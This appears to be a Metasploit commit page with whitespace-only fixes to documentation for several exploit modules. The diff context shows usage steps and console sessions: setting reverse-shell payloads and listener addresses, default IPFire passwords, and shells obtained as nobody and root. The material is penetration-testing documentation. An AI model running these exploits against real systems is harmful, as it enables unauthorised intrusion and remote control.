Skip to content

Commit e7043bd

Browse files
committed
add space fixes, try 1
1 parent 8a0a592 commit e7043bd

36 files changed

+100
-100
lines changed

documentation/modules/exploit/linux/http/axis_srv_parhand_rce.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -23,4 +23,4 @@ https://www.axis.com/files/sales/ACV-128401_Affected_Product_List.pdf
2323
5. Do: `set payload [name of payload]`
2424
6. Set LHOST if you are using a reverse shell
2525
7. Do: `run`
26-
8. You should get a session
26+
8. You should get a session

documentation/modules/exploit/linux/http/craftcms_preauth_rce_cve_2025_32432.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -76,7 +76,7 @@ ddev launch
7676
The module has the following option:
7777

7878
- **ASSET_ID**: This option is required for older versions of Craft CMS, particularly in the 3.x series.
79-
It specifies the asset ID for the Craft CMS instance. For 3.x versions, this ID must be set correctly to exploit the vulnerability.
79+
It specifies the asset ID for the Craft CMS instance. For 3.x versions, this ID must be set correctly to exploit the vulnerability.
8080

8181
For example, if you are targeting a Craft CMS version from the `>= 3.0.0`, `< 3.9.14`, make sure to specify the correct `ASSET_ID`.
8282
This is necessary for successful exploitation when dealing with these versions.

documentation/modules/exploit/linux/http/denyall_waf_exec.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -44,4 +44,4 @@ msf exploit(denyall_exec) > exploit
4444
meterpreter > pwd
4545
/var/log/denyall/reverseproxy
4646
meterpreter >
47-
```
47+
```
Lines changed: 30 additions & 30 deletions
Original file line numberDiff line numberDiff line change
@@ -1,6 +1,6 @@
11
## Vulnerable Application
22

3-
Official Source: [ipfire](http://downloads.ipfire.org/releases/ipfire-2.x/2.19-core110/ipfire-2.19.x86_64-full-core110.iso)
3+
Official Source: [ipfire](http://downloads.ipfire.org/releases/ipfire-2.x/2.19-core110/ipfire-2.19.x86_64-full-core110.iso)
44

55
This module has been verified against:
66

@@ -9,40 +9,40 @@ This module has been verified against:
99

1010
## Verification Steps
1111

12-
1. Install the firewall
13-
2. Start msfconsole
14-
3. Do: ```use exploit/linux/http/ipfire_oinkcode_exec```
15-
4. Do: ```set password admin``` or whatever it was set to at install
16-
5. Do: ```set rhost 10.10.10.10```
17-
6. Do: ```set payload cmd/unix/reverse_perl```
18-
7. Do: ```set lhost 192.168.2.229```
19-
8. Do: ```exploit```
20-
9. You should get a shell.
12+
1. Install the firewall
13+
2. Start msfconsole
14+
3. Do: ```use exploit/linux/http/ipfire_oinkcode_exec```
15+
4. Do: ```set password admin``` or whatever it was set to at install
16+
5. Do: ```set rhost 10.10.10.10```
17+
6. Do: ```set payload cmd/unix/reverse_perl```
18+
7. Do: ```set lhost 192.168.2.229```
19+
8. Do: ```exploit```
20+
9. You should get a shell.
2121

2222
## Options
2323

2424
### PASSWORD
2525

26-
Password is set at install. May be blank, 'admin', or 'ipfire'.
26+
Password is set at install. May be blank, 'admin', or 'ipfire'.
2727

2828
## Scenarios
2929

30-
```
31-
msf > use exploit/linux/http/ipfire_oinkcode_exec
32-
msf exploit(ipfire_oinkcode_exec) > set password admin
33-
password => admin
34-
msf exploit(ipfire_oinkcode_exec) > set rhost 192.168.2.201
35-
rhost => 192.168.2.201
36-
msf exploit(ipfire_oinkcode_exec) > set verbose true
37-
verbose => true
38-
msf exploit(ipfire_oinkcode_exec) > check
39-
[*] 192.168.2.201:444 The target appears to be vulnerable.
40-
msf exploit(ipfire_oinkcode_exec) > exploit
41-
42-
[*] Started reverse TCP handler on 192.168.2.117:4444
43-
[*] Command shell session 1 opened (192.168.2.117:4444 -> 192.168.2.201:38412) at 2017-06-14 21:12:21 -0400
44-
id
45-
uid=99(nobody) gid=99(nobody) groups=99(nobody),16(dialout),23(squid)
46-
whoami
47-
nobody
48-
```
30+
```
31+
msf > use exploit/linux/http/ipfire_oinkcode_exec
32+
msf exploit(ipfire_oinkcode_exec) > set password admin
33+
password => admin
34+
msf exploit(ipfire_oinkcode_exec) > set rhost 192.168.2.201
35+
rhost => 192.168.2.201
36+
msf exploit(ipfire_oinkcode_exec) > set verbose true
37+
verbose => true
38+
msf exploit(ipfire_oinkcode_exec) > check
39+
[*] 192.168.2.201:444 The target appears to be vulnerable.
40+
msf exploit(ipfire_oinkcode_exec) > exploit
41+
42+
[*] Started reverse TCP handler on 192.168.2.117:4444
43+
[*] Command shell session 1 opened (192.168.2.117:4444 -> 192.168.2.201:38412) at 2017-06-14 21:12:21 -0400
44+
id
45+
uid=99(nobody) gid=99(nobody) groups=99(nobody),16(dialout),23(squid)
46+
whoami
47+
nobody
48+
```

documentation/modules/exploit/linux/http/motioneye_auth_rce_cve_2025_60787.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -109,4 +109,4 @@ A script for manually signing requests is available in data/exploits/CVE-2025-60
109109
Example of usage:
110110
```
111111
python3 ./sign_request.py --method "GET" --path "/config/1/get/?force=true&_=1759747431350&_username=admin" --body "" --key ""
112-
```
112+
```

documentation/modules/exploit/linux/http/samsung_srv_1670d_upload_exec.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -91,4 +91,4 @@ msf exploit(samsung_srv_1670d_upload_exec) > [*] Obtaining credentails...
9191
[*] Executing payload...
9292
[*] Sending stage (33986 bytes) to 192.168.1.200
9393
[*] Meterpreter session 3 opened (192.168.1.122:4358 -> 192.168.1.200:55676) at 2017-06-19 11:52:22 +0100
94-
```
94+
```

documentation/modules/exploit/linux/http/trend_micro_imsva_exec.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -68,4 +68,4 @@ msf exploit(trend_micro_imsva_exec) > exploit
6868
[*] Attempting to login with notvalid:notvalid123
6969
[-] Exploit aborted due to failure: no-access: 12.0.0.140:8445 - Login with notvalid:notvalid123 failed...
7070
[*] Exploit completed, but no session was created.
71-
```
71+
```

documentation/modules/exploit/linux/http/trendmicro_imsva_widget_exec.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -58,4 +58,4 @@ msf exploit(trendmicro_imsva_widget_exec) > exploit
5858
pwd
5959
/opt/trend/imss/UI/adminUI/ROOT/widget
6060
61-
```
61+
```

documentation/modules/exploit/linux/http/xplico_exec.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -85,4 +85,4 @@ msf exploit(securityonion_xplico_exec) > exploit
8585
8686
id
8787
uid=0(root) gid=0(root) groups=0(root)
88-
```
88+
```

documentation/modules/exploit/linux/local/cve_2021_3493_overlayfs.md

Lines changed: 3 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -91,9 +91,9 @@ The binaries used by this exploit `data/exploits/CVE-2021-3493/cve_2021_3493.x64
9191
`data/exploits/CVE-2021-3493/cve_2021_3493.x64.elf` can and be used separately from
9292
metasploit. The parameters required are:
9393
```
94-
// argv[1] = The payload or executable you wish to launch
95-
// argv[2] = A directory to store the files and directories created when the exploit runs
96-
// argv[3] = A random string that is used to create directory names.
94+
// argv[1] = The payload or executable you wish to launch
95+
// argv[2] = A directory to store the files and directories created when the exploit runs
96+
// argv[3] = A random string that is used to create directory names.
9797
```
9898
```
9999
msfuser@ubuntu-18041:~$ id

0 commit comments

Comments
 (0)